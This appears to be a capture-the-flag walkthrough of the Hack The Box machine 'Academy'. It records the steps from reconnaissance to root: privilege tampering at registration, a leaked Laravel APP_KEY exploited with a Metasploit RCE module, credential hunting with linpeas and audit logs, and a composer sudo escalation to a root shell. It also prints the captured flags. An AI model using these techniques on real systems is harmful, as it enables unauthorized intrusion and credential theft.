Academy(HTB)
in Study on Htb
Take down this machine in 24 hours.
ACADEMY
Add hosts
#/etc/hosts
10.10.10.215 academy.htb
Nmap
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 62
80/tcp open http syn-ack ttl 62
95/tcp filtered supdup no-response
1827/tcp filtered pcm host-unreach from 10.10.14.1 ttl 63
1944/tcp filtered close-combat host-unreach from 10.10.14.1 ttl 63
4019/tcp filtered talarian-mcast5 no-response
5791/tcp filtered unknown no-response
7109/tcp filtered unknown no-response
7284/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
8602/tcp filtered unknown no-response
9888/tcp filtered cyborg-systems host-unreach from 10.10.14.1 ttl 63
9999/tcp open abyss syn-ack ttl 62
11369/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
11397/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
16401/tcp filtered unknown no-response
17087/tcp filtered unknown no-response
17501/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
18429/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
19682/tcp filtered unknown no-response
22574/tcp filtered unknown no-respons
Bruter dir
[200][text/html; charset=UTF-8][968.00b] http://academy.htb/admin.php
[200][text/html; charset=UTF-8][0b] http://academy.htb/config.php
[200][text/html; charset=UTF-8][716.00b] http://academy.htb/index.php
[200][text/html; charset=UTF-8][716.00b] http://academy.htb/index.php/login/
[200][text/html; charset=UTF-8][964.00b] http://academy.htb/login.php
[200][text/html; charset=UTF-8][1001.00b] http://academy.htb/register.php
[200][image/svg+xml][5.14kb] http://academy.htb/images/logo.svg
[200][text/html; charset=UTF-8][964.00b] http://academy.htb//login.php
[200][text/html; charset=UTF-8][1001.00b] http://academy.htb//register.php
Register
POST /register.php HTTP/1.1
Host: academy.htb
Content-Length: 49
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://academy.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://academy.htb/register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c9cqdl7n1t1s1ai4g2slian339; ajs_anonymous_id=%2295c634d6-5be3-453e-89ac-b11b7d262590%22; _fbp=fb.1.1604838364440.194187982
Connection: close
uid=admin&password=admina&confirm=admina&roleid=1 #roleid修改为1即可注册管理员账号
Login
http://academy.htb/admin-page.php
Academy Launch Planner | Item | Status | | ————————————————– | ——- | | Complete initial set of modules (cry0l1t3 / mrb3n) | done | | Finalize website design | done | | Test all modules | done | | Prepare launch campaign | done | | Separate student and admin roles | done | | Fix issue with dev-staging-01.academy.htb | pending |
Add hosts again
#/etc/hosts
10.10.10.215 dev-staging-01.academy.htb
Visit dev-staging-01.academy.htb
UnexpectedValueException
The stream or file "/var/www/html/htb-academy-dev-01/storage/logs/laravel.log" could not be opened in append mode: failed to open stream: Permission denied
Find sensitive information
SERVER_ADMIN
"admin@htb"
# ...
APP_NAME
"Laravel"
APP_ENV
"local"
APP_KEY
"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=" #interesting
APP_DEBUG
"true"
APP_URL
"http://localhost"
LOG_CHANNEL
"stack"
DB_CONNECTION
"mysql"
DB_HOST
"127.0.0.1"
DB_PORT
"3306"
DB_DATABASE
"homestead"
DB_USERNAME
"homestead"
DB_PASSWORD
"secret" #interesting
BROADCAST_DRIVER
"log"
CACHE_DRIVER
"file"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
QUEUE_DRIVER
"sync"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
MAIL_DRIVER
"smtp"
MAIL_HOST
"smtp.mailtrap.io"
MAIL_PORT
"2525"
MAIL_USERNAME
"null"
MAIL_PASSWORD
"null"
MAIL_ENCRYPTION
"null"
Find a Vuln
# https://www.exploit-db.com/exploits/47129
This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
In some cases the APP_KEY is leaked which allows for discovery and exploitation.
RCE!
msfconsole
use unix/http/laravel_token_unserialize_exec
set rhost 10.10.10.215
set vhost dev-staging-01.academy.htb
run
Get a reverse shell
Get www-data
ls /home/* -la
/home/21y4d:
total 20
drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 00:34 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
-rw-r--r-- 1 21y4d 21y4d 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 21y4d 21y4d 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 21y4d 21y4d 807 Feb 25 2020 .profile
/home/ch4p:
total 20
drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 00:34 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
-rw-r--r-- 1 ch4p ch4p 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 ch4p ch4p 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 ch4p ch4p 807 Feb 25 2020 .profile
/home/cry0l1t3:
total 332
drwxr-xr-x 6 cry0l1t3 cry0l1t3 4096 Nov 8 22:18 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root root 9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 cry0l1t3 cry0l1t3 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Feb 25 2020 .bashrc
drwx------ 2 cry0l1t3 cry0l1t3 4096 Aug 12 21:58 .cache
drwx------ 4 cry0l1t3 cry0l1t3 4096 Nov 8 19:56 .gnupg
drwxrwxr-x 3 cry0l1t3 cry0l1t3 4096 Aug 12 02:30 .local
-rw------- 1 cry0l1t3 cry0l1t3 160 Nov 8 22:18 .mysql_history
-rw-r--r-- 1 cry0l1t3 cry0l1t3 807 Feb 25 2020 .profile
-rw------- 1 cry0l1t3 cry0l1t3 1028 Nov 8 16:02 .viminfo
-rwxr-xr-x 1 cry0l1t3 cry0l1t3 288470 Nov 8 19:56 linpeas.sh #interesting
drwxr-xr-x 3 cry0l1t3 cry0l1t3 4096 Nov 8 19:56 snap
-r--r----- 1 cry0l1t3 cry0l1t3 33 Nov 8 15:25 user.txt #interesting
/home/egre55:
total 24
drwxr-xr-x 3 egre55 egre55 4096 Aug 10 23:41 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root root 9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 egre55 egre55 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 egre55 egre55 3771 Feb 25 2020 .bashrc
drwx------ 2 egre55 egre55 4096 Aug 7 12:13 .cache
-rw-r--r-- 1 egre55 egre55 807 Feb 25 2020 .profile
-rw-r--r-- 1 egre55 egre55 0 Aug 7 12:14 .sudo_as_admin_successful #interesting
/home/g0blin:
total 20
drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 00:34 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
-rw-r--r-- 1 g0blin g0blin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 g0blin g0blin 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 g0blin g0blin 807 Feb 25 2020 .profile
/home/mrb3n:
total 32
drwxr-xr-x 5 mrb3n mrb3n 4096 Nov 8 18:51 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root root 9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 mrb3n mrb3n 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 mrb3n mrb3n 3771 Feb 25 2020 .bashrc
drwxrwxr-x 3 mrb3n mrb3n 4096 Oct 21 10:55 .cache
drwxrwxr-x 3 mrb3n mrb3n 4096 Aug 12 22:19 .config
drwxrwxr-x 3 mrb3n mrb3n 4096 Aug 12 22:19 .local
-rw-r--r-- 1 mrb3n mrb3n 807 Feb 25 2020 .profile
run /home/cry0l1t3/linpeas.sh
/var/www/html/academy/.env.example:DB_PASSWORD=secret
/var/www/html/academy/.env.example:MAIL_PASSWORD=null
/var/www/html/academy/.env.example:REDIS_PASSWORD=null
/var/www/html/academy/.env:DB_PASSWORD=mySup3rP4s5w0rd!! #interesting
/var/www/html/academy/.env:MAIL_PASSWORD=null
/var/www/html/academy/.env:REDIS_PASSWORD=null
Get User
ssh cry0l1t3@10.10.10.215
mySup3rP4s5w0rd!!
$ cat user.txt
1488358ab64c0b5071a372bf91c277c8
Get Root
current user isnt in sudoers
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
so try to login as user egre55
uid=1000(egre55) gid=1000(egre55) groups=1000(egre55),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
[+] Checking for TTY (sudo/su) passwords in logs
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
Use composer to elevate privileges
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
composer --working-dir=$TF run-script x
sudo composer --working-dir=/tmp/tmp.3fjC6bZwMf run-script x
[sudo] password for mrb3n:
PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami
root
# bash
root@academy:/tmp/tmp.rMwFLB8jVl# cat /root/root.txt
f914bdf4c87e4ec6e7f7fe5afb053155
